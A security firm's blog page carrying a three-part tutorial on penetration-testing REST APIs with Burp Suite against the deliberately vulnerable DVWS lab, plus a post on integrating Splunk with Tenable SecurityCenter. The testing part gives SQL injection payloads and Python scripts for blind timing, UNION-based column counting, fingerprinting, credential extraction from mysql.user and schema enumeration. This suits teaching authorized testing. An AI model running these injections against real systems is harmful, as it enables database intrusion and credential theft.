
MindPoint Group Blog

06 Dec 2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting

Welcome back to the REST Assured blog series for Part 3: Reporting. While reporting is often overlooked by security professionals, compiling a report is almost always required of penetration testers once testing is complete. That's why today we're going to review how to pull all of our findings together into a thorough paper trail.

Reporting

Burp Suite makes it relatively easy to generate dumps of all the tests that Intruder performed; making them human-readable is another matter. In the Intruder window, select Save > Results Table. Burp Suite will open a pop-up offering a number of export options. Here are my recommended configurations based on the attacks we performed:

Due to the nature of how we tested, Burp Suite isn't able to automatically associate an Intruder-based attack with a vulnerability and remediation strategy. So, unfortunately, it's on us to parse the results manually and flag any anomalies worth including in a remediation strategy. To make the output file easy on the eyes, my recommendation is to use Microsoft Excel: create a new spreadsheet, go to Data > From Text/CSV, and choose the output file we just created. From there, Excel should start an import wizard. Make sure you select "Edit" to verify the data has been split into columns. Since some of our attack payloads include commas, we used tab as the delimiter. So, from the editing window choose "Split Column," make sure Tab is selected in the delimiter pull-down, and hit OK. If it looks okay, hit Close & Load. We should now have a workable table that includes every attack we performed except for the Repeater attacks, which I'll get to in a minute.
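
If you'd rather script this step than click through Excel, the same parsing can be done in a few lines of Python. This is only a minimal sketch: the filename is hypothetical, and the column names (Request, Payload, Status, Length) are assumptions about the headers in the Results Table export, so adjust them to whatever your export actually contains.

import csv

# Load the tab-delimited Intruder results table (hypothetical filename; assumed headers).
with open("intruder_results.txt", newline="", encoding="utf-8") as f:
    rows = list(csv.DictReader(f, delimiter="\t"))

baseline = rows[0]  # Request 0 is the unmodified control request
for row in rows[1:]:
    # Flag anything whose status code or response length differs from the control.
    if row.get("Status") != baseline.get("Status") or row.get("Length") != baseline.get("Length"):
        print(row.get("Request"), row.get("Status"), row.get("Length"), row.get("Payload"))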

Next, we need to include the server's responses to each of these attacks. This is where the throttling we configured in Part 1 of this blog series pays off, when we slowed down Burp Suite's automated scans. Although it adds a lot more testing time, it is 100% required if we want our server response packets in an order that matches the Request # from our first set of attack data. To do this, from the Burp Suite Intruder window, select Save > Server Responses. Create a folder for the server responses and make sure "Concatenate to a single file" is NOT selected. You'll see why in a second.

In Excel, go to the Data tab again > Get Data > From File > From Folder. Select the folder we just saved the responses to and click OK. Make sure to click Edit when the import preview appears. On the Content column header, click the button circled in red below.

In the pop-up, choose "Tab" from the delimiter pull-down, then click OK, then Close & Load. From here you should have a workable data dump of every packet, which you can now sort by the "Name" column to match the request numbers from the previous data set. So now we have an exhaustive, sortable spreadsheet of all the attacks we attempted in the Intruder scan.
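
The same pairing can be scripted if Excel isn't your thing. Here's a minimal sketch with the big assumption called out: it expects the Save > Server Responses folder (hypothetical name below) to contain one file per request, named after its request number, so verify how your copy of Burp Suite names the files before relying on it.

from pathlib import Path

responses = Path("server_responses")  # hypothetical folder from Save > Server Responses

def request_number(p):
    # Assumes each file is named after its request number; falls back to -1 if no digits found.
    digits = "".join(ch for ch in p.stem if ch.isdigit())
    return int(digits) if digits else -1

for path in sorted(responses.iterdir(), key=request_number):
    lines = path.read_text(errors="replace").splitlines()
    status_line = lines[0] if lines else "(empty response file)"
    print(path.name, status_line)  # e.g. "42  HTTP/1.1 200 OK"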

Reporting on the Repeater testing we performed is super easy. All we need to do is select the body of the request inside Burp Suite, right-click > Save Item. It's that easy. Make sure to uncheck "Base64-encode requests and responses," as this will ensure the packets are human-readable. We'll have to do this for every request of value that we used in the penetration test, but Burp Suite saves them as XML files that are relatively easy to parse and include everything in both the sent and received packets.
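
Those XML files can be summarized with a short script as well. This is a sketch only, assuming the export uses Burp's usual <items>/<item> layout with <url>, <status>, and <request> child elements and that Base64 encoding was unchecked as described above; check your own export before trusting the element names, and note the filename is hypothetical.

import xml.etree.ElementTree as ET

root = ET.parse("repeater_item.xml").getroot()  # hypothetical filename from Save Item

for item in root.iter("item"):
    url = item.findtext("url", default="?")
    status = item.findtext("status", default="?")
    request = item.findtext("request", default="") or ""
    # Print the status and URL, plus the first couple of lines of the raw request.
    print(status, url)
    print("\n".join(request.splitlines()[:2]))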

That should be it as far as generating our paper trail! Everything is accounted for and documented in our testing.

Although we only really focused on conducting SQL injection testing, you can use this blog as a logical guide for other tests, such as Cross-Site Scripting and Cross-Site Request Forgery.

Both are excellent reads and I highly recommend them.

In conclusion, I hope you enjoyed following along with this blog series and learning how to test RESTful API services, as more and more service providers keep promoting these interfaces. Personally, I think they're wonderful, as they extend so much functionality to the people who use them; however, as we just found out, testing them can require some extra steps. Feel free to comment on this blog or reach out to me on social media with any questions or comments! I really appreciate you taking the time to stop by and hopefully learn a thing or two about conducting your own, safe penetration tests of RESTful APIs using Burp Suite!



18 Nov 2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 2 – Testing

Welcome back! In Part 1 of the REST Assured blog series, we discussed the definitions and history behind APIs, and we reviewed how to properly configure Burp Suite for conducting security testing against them. In Part 2, we're getting into the fun part: testing.

Testing

I'll preface the testing by mentioning that it's important to be familiar with HTTP status codes, since they help us understand how the server is handling our attack packets. Below is a subset of HTTP status codes from OWASP that can be used as a point of reference:


Status code | Message | Description
200 | OK | Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH, or DELETE.
201 | Created | The request has been fulfilled and a resource created. A URI for the created resource is returned in the Location header.
202 | Accepted | The request has been accepted for processing, but processing is not yet complete.
400 | Bad Request | The request is malformed, such as a message body format error.
401 | Unauthorized | Wrong or no authentication ID/password provided.
403 | Forbidden | Used when authentication succeeded but the authenticated user doesn't have permission to the requested resource.
404 | Not Found | Returned when a non-existent resource is requested.
405 | Method Not Allowed | The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used.
406 | Not Acceptable | The client presented a content type in the Accept header which is not supported by the server API.
413 | Payload Too Large | Used to signal that the request size exceeded the given limit, e.g. regarding file uploads.
415 | Unsupported Media Type | The requested content type is not supported by the REST service.
429 | Too Many Requests | Used when a DoS attack may have been detected or the request is rejected due to rate limiting.
500 | Internal Server Error | An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 | Not Implemented | The REST service does not implement the requested operation yet.
503 | Service Unavailable | The REST service is temporarily unable to process the request. Used to inform the client that it should retry at a later time.

(Source: https://www.owasp.org/index.php/REST_Security_Cheat_Sheet)

So, given this information, let’s take a look at some of my results and see if you can see anything odd or unusual:

The very first request here (Request 0) is our control, with no modification to the original request, so it returned what we were expecting. However, if you look closely at the other attack packets, their statuses are all HTTP 200. If that truly is the case, then this application has a major problem with how it handles these attacks, as they shouldn't be returning HTTP 200 statuses (they should be 400 at the API level, or 404 since we're messing with the URL). Let's take a closer look at some of these.

Yikes! This would be pretty bad to see in the real world. This type of error is generated by the database itself, MariaDB, which means that we have successfully touched the backend of the system through this interface. Now it's just a matter of time until we're able to get something other than errors. We also now understand why it's returning HTTP 200: the API processed the request, but the backend SQL threw an error. Looking at the error message, it appears the "a" in the payload was swallowed, since it's not in the response, which makes me believe the parameter we're attacking is supposed to be an integer, not a character. It's also possible the rest of the injection is breaking the backend requests, which is a good sign as an attacker. Let's look at an attack that starts with an integer.
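
As an aside, this kind of error-based check is easy to automate outside of Burp Suite. The sketch below sends a few probe payloads and looks for database error strings in the response body; the endpoint URL, the parameter placement, and the error signatures are all illustrative assumptions rather than DVWS specifics, so swap in whatever matches your target.

import requests

base = "http://localhost/dvws/api/users/"  # hypothetical endpoint; adjust to your target
error_signatures = ["You have an error in your SQL syntax", "MariaDB server version"]

for payload in ["1", "1'", "1 AND 1=2"]:
    r = requests.get(base + payload, timeout=10)
    hits = [s for s in error_signatures if s in r.text]
    # An HTTP 200 with a database error string in the body is exactly the anomaly we're hunting.
    print(payload, r.status_code, hits or "no obvious DB error")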

Well, there you have it. The whole table was dumped. We knew ahead of time that this particular service was vulnerable to this attack though, so let’s look at some other findings that would serve as a more practical test:

For this attack we tried to inject a “sleep” command, which just tells the database to wait a set number of seconds; however, we’re not 100% sure what happened. The database didn’t throw an error, but it didn’t return anything either. This result is a common example of a finding that requires follow-up. I turned on the columns that show us the response time to give us an idea. I don’t believe we successfully injected a sleep statement based on the response time, but if we right-click this attack, we can forward it to the repeater to make our own changes to help us dig deeper into what is happening.

Here you can see the response time of our request is 13 milliseconds (bottom right of response), so the command isn’t taking, but it’s not throwing errors. Let’s try messing with some things:

In the request above, we can see that our encoded characters are getting translated in the response. We've also learned through the error messages that this database is running MariaDB. Let's include the integer value for the user ID before our attack this time and see what happens:

Bingo. We successfully got the MariaDB server to execute the command “SLEEP(5)” and we verified it in the response time it took (5 seconds) on the bottom right of the response. The SLEEP command is an extremely common way of testing for Blind SQL Injection due to the somewhat Boolean response from the server itself. The sleep timer either worked or it didn’t. The successful execution of the “SLEEP” command can enable us to gain more information about the database’s syntax and get a deeper understanding of what is happening behind the curtain. Let’s pretend we didn’t dump the table already and take this a step further now that we’ve succeeded in injecting commands and see how far the rabbit hole goes.
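
Before going further, here's a quick scripted version of the timing check just described: compare the response time of a control request to one carrying SLEEP(5). The endpoint and parameter placement are hypothetical, and a real test should repeat the measurement a few times to rule out network jitter.

import time
import requests

base = "http://localhost/dvws/api/users/"  # hypothetical endpoint; adjust to your target

def timed_get(payload):
    start = time.monotonic()
    requests.get(base + payload, timeout=30)
    return time.monotonic() - start

control = timed_get("1")
delayed = timed_get("1 AND SLEEP(5)")
# If the SLEEP payload takes roughly five seconds longer than the control, the injection executed.
print(f"control: {control:.2f}s  sleep payload: {delayed:.2f}s  injected: {delayed - control > 4}")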

So, we did a couple of things here. The first thing we did is add “1=2” after the AND, which basically modifies the original query to not return anything (it’s returning false). The false statement is important because we want to count how many columns the query is selecting by injecting our own “UNION SELECT” command. Here we start with a single “NULL” value. Notice in the response that the database is saying that’s not the right number of columns selected. Let’s keep adding NULL values until we get something that takes (assuming we didn’t already know a valid query returns two columns).
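
The column-counting loop described above is also easy to script. This sketch keeps adding NULLs to the injected UNION SELECT until the column-count error disappears; the endpoint is hypothetical and the error string is the usual MariaDB/MySQL message, so confirm both against your own responses.

import requests

base = "http://localhost/dvws/api/users/"  # hypothetical endpoint; adjust to your target

for n in range(1, 11):
    nulls = ",".join(["NULL"] * n)
    r = requests.get(f"{base}1 AND 1=2 UNION SELECT {nulls}", timeout=10)
    # MariaDB/MySQL complain about "a different number of columns" until the count matches.
    if "different number of columns" not in r.text:
        print(f"the original query appears to select {n} column(s)")
        break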

Okay, so now we know we have the correct number of columns selected for this specific query. Once we have the correct format for our commands, we can use this as a blueprint for some nastier things, such as:

Ah-ha! Success! By adding @@version in place of a NULL value, we’re able to increase our understanding of the database itself. Moving forward:

Using @@datadir, we can determine this is a Windows-hosted database due to the file structure. Knowing the host operating system can be useful for later attacks if we ever try to grab any system files or folders (if this were Linux, we could later try to grab /etc/passwd, for example). Let's check on the account that the database itself is using to give us an idea of its privileges.
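
For reference, the fingerprinting probes used in this stretch can all be run from one small loop, substituting each expression into the first column of the two-column UNION SELECT we worked out above. As with the earlier sketches, the endpoint is a hypothetical stand-in.

import requests

base = "http://localhost/dvws/api/users/"  # hypothetical endpoint; adjust to your target

for probe in ["@@version", "@@datadir", "current_user()"]:
    r = requests.get(f"{base}1 AND 1=2 UNION SELECT {probe}, NULL", timeout=10)
    # Each response should reflect the probed value wherever the first column is displayed.
    print(probe, "->", r.text[:200])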

That’s convenient. Looks like a stock root account (a default setup for DVWS which explains the insecurities in this configuration). Now for my favorite part, stealing account credentials!

Above we modified the UNION SELECT command to select users and their passwords from "mysql.user", which is where the user account information is stored. You'll notice in this test instance the account passwords (listed in the "last_name" fields) are blank, which is due to the stock setup of DVWS. If this were a live or test system, we would (hopefully) be seeing the hashes of their passwords there. With that information we can conduct offline brute forcing or use a rainbow table to crack the hashes. There are a number of existing tools to assist with cracking hashes (hashcat, John the Ripper, etc.), but we'll leave that to a future discussion. Next up, let's look at the list of databases:

You can see here that we're continuing to modify the values we're selecting, and in this case we selected "schema_name" from "information_schema.schemata." This returns a list of all the databases running on the server: dvws, information_schema, mysql, performance_schema, phpMyAdmin, and test. Now going deeper, let's investigate the columns for each of these:
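
Here's a sketch of that column enumeration, again with a hypothetical endpoint and the two-column shape established earlier: group_concat keeps each schema's table and column names in a single row so the whole listing comes back in one response.

import requests

base = "http://localhost/dvws/api/users/"  # hypothetical endpoint; adjust to your target
schemas = ["dvws", "mysql", "information_schema"]

for schema in schemas:
    payload = ("1 AND 1=2 UNION SELECT group_concat(table_name,'.',column_name), NULL "
               f"FROM information_schema.columns WHERE table_schema='{schema}'")
    r = requests.get(base + payload, timeout=10)
    print(schema, "->", r.text[:300])  # truncated dump of the response body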

It's possible to extend this command to continue cleaning up the type of information shown here, but you can see where we're going. We can continue to modify this attack, one request at a time, until we're able to dump everything from every database to which we have access. Once we learned this was a MySQL server, we could use that knowledge to guide our modifications to the attack query, targeting its syntax and structure. I'm fairly confident that we could even modify this query to do things like dump every database and its contents to a file and then return it to us, considering we already determined we can execute privileged commands. Dumping the contents to a file could give us, as attackers, plenty of time to go over the content if we were worried about generating excess logs or if time were of the essence. I think this is a safe place to end our SQL injection testing since we've pretty much proven we can now do anything we want with the MySQL server.

What’s Next?

This will conclude Part 2: Testing of the REST Assured blog series. Stay tuned for Part 3 on reporting where we’ll learn how to put everything together into manageable data sets and wrap up this series.



14 Nov 2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 1 – Introduction & Configuration

Introduction:

Hello and welcome to our 3-part blog series where we take a dive into the technical aspects of conducting exhaustive penetration tests against REST API services and generating reports based on what tests were performed and what our findings are. Because the subject matter is relatively technical, I'm making some assumptions about the reader's knowledge base: namely, that they're at least familiar with the concepts behind conducting penetration testing and vulnerability analysis. That said, if you happen to have a RESTful API service that you're looking to conduct a penetration test against, then make sure to stick with us as we dig into the specifics of how to leave no stone unturned. Part 1 covers the dos and don'ts of configuring and optimizing our scan engine to make sure we're set for success. Part 2 consists of the actual penetration testing itself, and Part 3 covers formatting our results and generating a detailed report. I hope this series will be helpful to my fellow security enthusiasts of all skill levels. Please feel free to reach out to me or comment below if you ever have any questions or comments and I'll make sure to help in any way I can. Now let's get started!

History: What is an API?

More and more companies have been expanding their target audience by extending their host of web services to others and providing interfaces for automated services, such as Single Sign-On (SSO), using an Application Programming Interface (API). APIs typically provide all the same services that the provider's web application supplies, just without a graphical interface. APIs are meant to act as an interface for answering automated requests, typically issued by processes instead of people. Because of this, a specific ruleset exists for communicating with an API correctly, and in this blog we're going to look at how to properly test these services for security vulnerabilities using PortSwigger's tool, Burp Suite.

Why Burp Suite?

Burp Suite is an incredibly powerful web application proxy that also performs security vulnerability analysis.  Many security experts will tell you that it provides you with the most return on your investment. For a mere $350 license, you can unlock the “Pro” mode and hack to your heart’s content, which is something many of their competitors can’t say. It isn’t, however, without its shortcomings. Configuring and using Burp Suite to provide you with the results you are looking for can be difficult for anyone not well versed with the ins and outs of the types of attacks that are to be tested; even more so when conducting penetration tests on web APIs.

Rules of Engagement

Before we begin, it's important to note that due to the nature of this blog, I assume the reader understands the correct use-case scenarios for when penetration testing is and isn't allowed against a host service, and thus I and MindPoint Group are not responsible for actions taken on the reader's behalf. I shouldn't have to say this, but only use these instructions to test APIs that you are permitted to test, either your own or your customers' (and only with a written Rules of Engagement (ROE) agreement outlining the scope of your testing!). If you are new to or interested in entering the penetration testing or vulnerability analysis field, please comment at the end of this blog or reach out to me personally and I'd be happy to help you get started down the right path.

Now, disclaimers aside, let’s begin:

The scope determines how the penetration test is performed and how much we may or may not know about the RESTful API service in question. For whitebox and greybox tests, we could have full documentation, use-case scenarios, and even stock JavaScript Object Notation (JSON) request tokens outlining the structure of the HTTP packets the API accepts. For blackbox tests, however, we'll have to build our packets through trial and error using API debugging/mapping tools, such as Postman, and by capturing valid requests/responses using Burp Suite as a proxy service. Due to the time constraints of most tests, it's usually more cost effective to aim for whitebox tests. Whitebox tests provide the assessor with all the information they need so they can correctly identify and focus on attacking the weakest links as quickly and effectively as possible. Also, due to the destructive nature of the tests we're conducting, it's important that all parties involved understand the risks and that we test only targets in the specified scope.

For the purposes of this blog, we're going to be using Damn Vulnerable Web Service (DVWS) for our test scenarios. It's a very simple, easy-to-use web service that supports a vulnerable RESTful API we can test.

Reconnaissance

Any typical penetration test starts with a substantial amount of research, typically referred to as information gathering. Ask questions such as: What is the target's digital footprint? Where is the target's lowest-hanging fruit? These are the questions we're most interested in answering first.

  • Browsing
    • You typically won't be able to find API services by simply navigating a site and finding a link. While Google hacking is a little outside the topic of this blog, there are a plethora of ways to discover APIs for a targeted host site. A number of different API aggregators and search engines exist (such as our friends at ProgrammableWeb.com), which would be a great place to start to see if a target's API has been publicly cataloged or documented. We can also leverage Burp Suite's web spider functionality to try to discover API pages. After manually navigating your target's website while capturing traffic in Burp's proxy and adding the site to your scope (right-click the target site in Target > Site Map, Add to scope), perform a crawl by selecting the host URL and choosing right-click > Spider this host. Once complete, we can navigate to the root of the site, sort the results by MIME type, and look for JSON, which could indicate a RESTful API.

  • Postman
    • I've picked up the use of Postman (https://www.getpostman.com) through some developers I know who use it to help with debugging throughout the API development process. I've found it quite useful, and it can assist us in a similar manner: getting started with known-good API requests and then beginning our testing from there. The API we're testing in DVWS is extremely simple, but in the real world you can expect JSON requests full of variables and parameters, looking something like the illustrative request sketched just after this list:

    • Next, we can configure Postman to communicate correctly with the host API:

    • We can then point Postman at the proxy service so that Burp Suite's proxy captures the traffic, allowing us to start getting our hands dirty:

  • Burp Suite
    • Now, let’s send a known-good request to our target API through Postman and verify we captured it in Burp Suite:

    • If we right-click anywhere in the raw message, we can send it to a number of different parts of Burp Suite, but let's start by sending it to Repeater. From here we can use Burp Suite's Repeater function as basically our own Postman: we can replay this packet any number of times, performing minor manual tweaks and observing the response. Using Repeater, I'll take the time to check the server's responses to our requests while I make minor changes to the packet in different areas to see what types of error messages the server responds with. Once I get a feel for how many different types of error messages and responses the application yields, I'll right-click the body of the known-good request and send it to Intruder. This is where it gets interesting.
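
As promised above, here's a hedged sketch of what sending one of those known-good JSON requests can look like when it's routed through Burp's default proxy listener on 127.0.0.1:8080, whether you build it in Postman or in a few lines of Python. The endpoint and the JSON fields are purely illustrative stand-ins, not DVWS specifics.

import requests

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
payload = {"username": "testuser", "role": "user", "active": True}  # illustrative fields only

r = requests.post(
    "http://localhost/dvws/api/users",  # hypothetical API endpoint; use your own target
    json=payload,
    proxies=proxies,
    verify=False,  # Burp's CA certificate usually isn't trusted in a test setup
)
print(r.status_code, r.text[:200])  # the request should also appear in Proxy > HTTP history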

Configuring

First, before we dive into the depths of the hands-on parts, I feel it's necessary to do some of the configuring I'll expand on below. These recommendations are all based on trial and error on my part in dealing with Burp Suite's lack of good reporting features. It's one thing to conduct an exhaustive penetration test; it's another thing to have thorough, well-defined start and stop points showing which tests were and were not performed and what their results were. All that said, I feel that Burp Suite is lacking when it comes to API vulnerability reporting, which is unusual considering its regular write-ups on the vulnerability analysis end are relatively good. Not to worry though! With my help, I'll have you impressing your boss's boss with the amount of metrics we can show them to back up our claims.

On the Intruder > Positions tab, make sure Attack Type is set to "Sniper." This is important when it comes to generating our report, as it fires attacks off in sequential order, making it much easier to interpret which attack triggered which response in the packets we sent and received.

Make sure to correctly define your positions by selecting all of your parameters and clicking "Add §." This tells Burp Suite exactly where in the message it will conduct its injections. In this test scenario, we're telling Burp to inject into the numeric URL parameter for the user value, but most tests will also select parameters in the body. The Sniper attack works through each of these positions sequentially, top to bottom. So when we look at the results and it says "attack position: 1," that refers to the first "§" value we defined.

Now, on to the Payloads tab. This is where some of your personal preference will come into play. I prefer to keep my types of penetration tests separate, as it makes reporting and logging much easier; so, we'll be breaking up SQL injections from XSS injections, for example. Because of this, we want to separate out the payloads. Under Payload Options, there's a pull-down for "Add from list." We'll want to select "Fuzzing – SQL Injection." Keep in mind we'll have to go through each attack type and generate separate reports for each one. Later, we can add them together as one giant report if we want, but we want to make sure we don't miss anything. It's also worth noting that if we wanted to use another list of attacks, we could certainly import something like Wfuzz's wordlists of attacks. Feel free to go as deep in this category as you want; the more attacks the merrier! Payload Processing in Burp Suite gives us additional options, such as character replacement for placeholders like "<yourservername>" and "<youremail>", substituting a string that is applicable for the attack. Flip through the different lists to get a feel for what characters you want to substitute and with what. It's also possible to encode/decode our attack strings to bypass things such as input filtering. If no attacks are working, keep cycling through these options to see what is possible.

So we're almost ready to start; however, there's one last thing I'd strongly advise doing: throttling. I'd recommend changing these values from the defaults under the Options tab: Number of threads: 1, Throttle (milliseconds): 20.

This configuration will be different for every API. I will also warn you that Burp Suite does something a little odd here, which took me far longer to figure out than I'd like to admit, and my only way to combat it was to use a single thread and throttle it. When exporting your results (post-scan), Burp Suite will store the responses from the target in a different order than it lists them in the attack results window. The first 10-15 results should be in the same order; however, if you navigate to Save > Server Responses, the order of the response packets will almost always be wrong by the time you get to the 40th or so packet. I'm not 100% sure why this happens, but in my testing I believe it occurs when one thread's request takes longer to process than another's, so the response ends up out of order on the receiving end in the proxy. Burp's session management maintains the session information correctly throughout the testing, but I think the proxy or logging isn't maintaining the order properly. So, when a data dump of the responses is generated, Burp dumps the packets in the order they were received, not paired with the correct request number. It really is unfortunate, because this causes larger-scale scans to take significantly longer, but if you care about providing accurate artifacts at the end of your testing, it is necessary. If reporting isn't your thing, then you can skip this step.

What’s Next?

In this blog, we reviewed the configuration of Burp Suite. In Part 2 of this blog series, we'll review testing, and in Part 3, we'll review reporting.

 



18 Jul 2018

A Tale Of Two Tools: When Splunk met SecurityCenter

Co-Authors: Keith Rhea and Alex Nanthavong

It was the best of times, it was the worst of times, it was the age of technological advancements, it was the age of attack, it was the epoch of cybercrime, it was the epoch of opportunity, it was the season of Remediation, it was the season of Exploitation, it was the spring of Security, it was the winter of Vulnerability. We had targets and queries before us, with the data all going direct to SecurityCenter, while the queries were all staying in Splunk — in short, the race between attackers’ access to exploits and defenders’ ability to assess, remediate and mitigate them remained a never-ending cycle. The usefulness and identification of new vulnerabilities could no longer rely on either tool operating independently of each other. When Splunk met SecurityCenter, the alerts of outstanding vulnerabilities were received for remediation before compromise and helped to stay ahead of exploitation.[1]

With the integration of security tools, vulnerability management programs can improve the security posture of cloud environments. Tenable Research published a study that measured the difference in time between when an exploit for a vulnerability becomes publicly available (Time to Exploit Availability, or TtEA) and when a vulnerability is first assessed (Time to Assess, or TtA). The delta, negative or positive, indicates the window of opportunity (or lack thereof) for an attacker to exploit an unknown vulnerability. The researchers based their sample set on the 50 most prevalent vulnerabilities from nearly 200,000 unique vulnerability assessment scans over a 3-month period in late 2017, and their findings indicate that attackers have a significant advantage over defenders.

As migration to the cloud and adoption of cloud business models increase, assets in those environments are constantly being introduced and retired. Traditional forms of asset tracking are woefully inefficient in highly dynamic cloud environments, and this extends to traditional vulnerability management systems and techniques as well. To improve the TtA, continuous vulnerability assessments can be implemented; however, that alone is not enough to fully mitigate the nightmare of performing effective vulnerability management in these rapidly changing environments. Analysis of vulnerability scanning behavior indicates that just over 25 percent of organizations are conducting vulnerability assessments at a frequency of two days or fewer. Contrary to popular belief, a successful vulnerability management program includes more than just a snapshot-in-time scan of an environment. While point-in-time scanning is an achievable first step for most organizations and will reduce the head start that attackers have for most vulnerabilities, it still leaves a negative delta and an exposure gap for many others. The impact of this exposure gap can be significant depending on the vulnerabilities in question. Shortening the window between scans and moving toward continuous or near real-time vulnerability scanning will have the most positive impact on the TtEA vs. TtA time delta.

Not only should regular scanning occur, but there also needs to be careful analysis of the vulnerabilities identified to determine the risks associated with them, dependent on any compensating controls available in the environment. This analysis provides the basis for determining remediation timeframes. Everyone agrees that vulnerability management is a necessary function of an effective security practice; in our experience, however, this is not enough to combat the speed at which attackers move. We advocate for organizations to shorten the vulnerability scan cycle time as much as possible, while also improving upon traditional, static asset tracking by gathering data dynamically from sources like cloud infrastructure APIs and CMDBs. As Dickens says, as if he were a Security Officer, "Nothing that we do, is done in vain. I believe, with all my soul, that we shall see triumph."[2]

Achieving Better TtA via Integration of Splunk and SecurityCenter

MindPoint Group security engineers were able to enhance all phases of their vulnerability management program by integrating Splunk and Tenable SecurityCenter. This integration allows the team to gather asset data via the cloud infrastructure API and correlate that data with near real-time vulnerability data. The team is now able to adapt and react more quickly to the rapidly evolving threat landscape in highly dynamic operating environments. The correlation and analysis of vulnerabilities within a highly dynamic cloud environment is made possible by using SecurityCenter to scan, consolidate, and evaluate vulnerability scans across the organization, and Splunk to aggregate vulnerability data, asset data, and other sources of events and log data from various components of a large cloud environment. With all these sources of data ingested real-time into the Splunk environment, reports and alerts can now be generated to provide in-depth, on-demand vulnerability data to address potential threats as they are discovered.

So How Does it Work?

Security tooling is important, and having tools configured and operating correctly is an important first step for a security team. The effectiveness of individual security tools is greatly reduced when they operate independently of each other, and many security teams greatly increase their effectiveness by working to integrate existing tools, processes, and data sources instead of buying yet another tool. The diagram above illustrates the vulnerability management process and the components needed to integrate SecurityCenter and Splunk. This integration is important because it provides security teams with the ability to move beyond the old standards and methods of periodic vulnerability scanning. Integration of these two tools provides security teams with an enhanced view of their data for improved aggregation, searching, and reporting capabilities. An enhanced vulnerability management approach based on an agile, API-driven, DevSecOps model is necessary to decrease the TtA for vulnerabilities and ultimately shorten the time delta for defenders. Each tool plays a crucial role in the overall integration and enables security teams to have more actionable information to ensure timely remediation.

Once scan data, cloud asset data, and other data sources have been fed into Splunk, we are able to use a query like the following, which pulls vulnerability events from the most recent relevant scans, enriches them with AWS asset data from a lookup, and counts the matches:


index=tenable severity.name=* (
    [ search index=tenable scan_result_info.name!=*DEAD* scan_result_info.name!=*Security* (scan_result_info.name=GC* OR scan_result_info.name=COMM*)
    | rename scan_result_info.name as ScanName
    | convert num(scan_result_info.finishTime) as time
    | eval finish=strftime(time, "%Y-%m-%d %H:%M:%S")
    | dedup ScanName
    | table ScanName finish scan_result_info.id
    | return 15 scan_result_info.id])
| lookup aws-instances.csv private_ip_address as ip
| search tags.ApplicationID=* accountName=* tags.op_env=*
| stats count

From within Splunk we are then able to produce reports, alerts, and dashboards to provide development, operations, and security teams with in-depth, on-demand vulnerability data to address potential threats as they are discovered. Alerts can be customized so that they are generated using the remediation and prioritization criteria mandated by an organization.

Once security teams are continuously alerted and armed with vulnerability data, they are better able to align operational processes to support rapid response and ad hoc remediation and mitigation requests outside of regular maintenance and patch windows. Those efforts for targeted remediation and prioritization can be better focused on vulnerabilities with publicly available exploits and those actively being targeted by malware, exploit kits and ransomware.

This enables up-to-date situational awareness and threat context to evaluate true risk and exposure as well as to inform and guide decision making. By leveraging the integration of Tenable, Splunk, and AWS, vulnerability, configuration, and asset data can be used to conduct deep security analysis, and achieve the awareness, perspective and information needed to make effective security decisions.

References:

[1] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 1, Chapter 1: The Period

[2] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 2, Chapter 16: Still Knitting

Quantifying the Attacker’s First-Mover Advantage. (2018, May 24). Retrieved June 1, 2018, from https://www.tenable.com/blog/quantifying-the-attacker-s-first-mover-advantage
